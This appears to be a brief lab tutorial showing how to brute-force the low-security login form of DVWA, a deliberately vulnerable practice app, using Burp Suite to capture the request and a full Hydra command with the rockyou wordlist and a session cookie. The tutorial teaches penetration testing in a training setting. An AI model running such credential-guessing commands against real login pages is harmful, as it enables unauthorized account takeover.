Today is a quick example on how to brute force a low security login form on the DVWA machine using Hydra
You will need
- Kali Linux
- Hydra
- DVWA
- Burp Suite
- Wordlist
First we need to capture the Login request with Burp to get a Cookie and a response to see how the page works when responding to a “Failed Login”
Fire up Burp and capture the request
This is all we are going to need from burp it gives us the Parameter, the Url and the cookie for the attack
Next lets utilize Hydra open up a Terminal and type the following command (make sure url is correct) as it it case sensitive and you will get false positives from Hydra
hydra 10.0.1.5 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form “/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:USername and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rf0uoeqqtio083hl4opmmq2j57”
execute the command and you will start seeing the response if you used the verbose mode -v once successful you will see the login information highlighted in green
That is it for Low Security!
DMCXBLUE 